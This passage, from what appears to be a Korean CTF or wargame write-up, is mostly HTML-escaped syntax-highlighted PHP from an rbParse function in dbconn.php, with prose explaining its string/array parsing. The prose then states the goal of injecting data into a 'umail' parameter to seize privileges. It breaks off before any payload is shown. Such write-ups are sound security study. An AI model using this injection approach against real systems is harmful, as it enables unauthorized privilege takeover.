rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-35&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$parsed&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-36&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-37&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-38&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-39&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-40&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-41&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;2048&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-42&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-43&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$parsed&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-44&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;rbParse function in dbconn.php&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;rbParse 함수는 받아온 rawdata를 한 바이트씩 읽어들이는데, 여기서도 STR과 ARR이 사용됩니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;만약 따라오는 데이터가 string일 경우 1의 값을 가지며 길이 값을 받아오고, 해당하는 길이만큼 parsed에 저장합니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;string이 아닌 array일 경우 2의 값을 가지며 아래와 같은 프로세스를 가집니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;1. 배열의 갯수 파싱&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;2-1. 이후 뒤따라오는 데이터가 또 다시 배열일 경우 해당하는 갯수만큼 string 값을 가져와 parsed에 저장(2차원 배열의 형태)&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;2-2. 이후 뒤따라오는 데이터가 string일 경우 해당하는 갯수만큼 string 값을 가져와 parsed에 저장(1차원 배열의 형태)&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;자, 익스플로잇에 필요한 메뉴 분석은 모두 끝마쳤습니다. 이제 이 정보를 이용해 umail 파라미터에 데이터를 삽입해 권한을 탈취해야합니다. 하지만 문제는 rbPack 함수의 내용을 토대로 생각해보면 아무리 umail 파라미터에 데이터를 삽입해도 결국 string이기 때문에 파싱 과정에서 해당 길이만큼 평문으로 인식해버린다는 점입니다.&lt;/p&gt;&lt;div id=&quot;crayon-5c677473e1aa9846940848&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa9846940848-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 729.6px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa9846940848-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strlen&lt;/span&gt;&lt;span 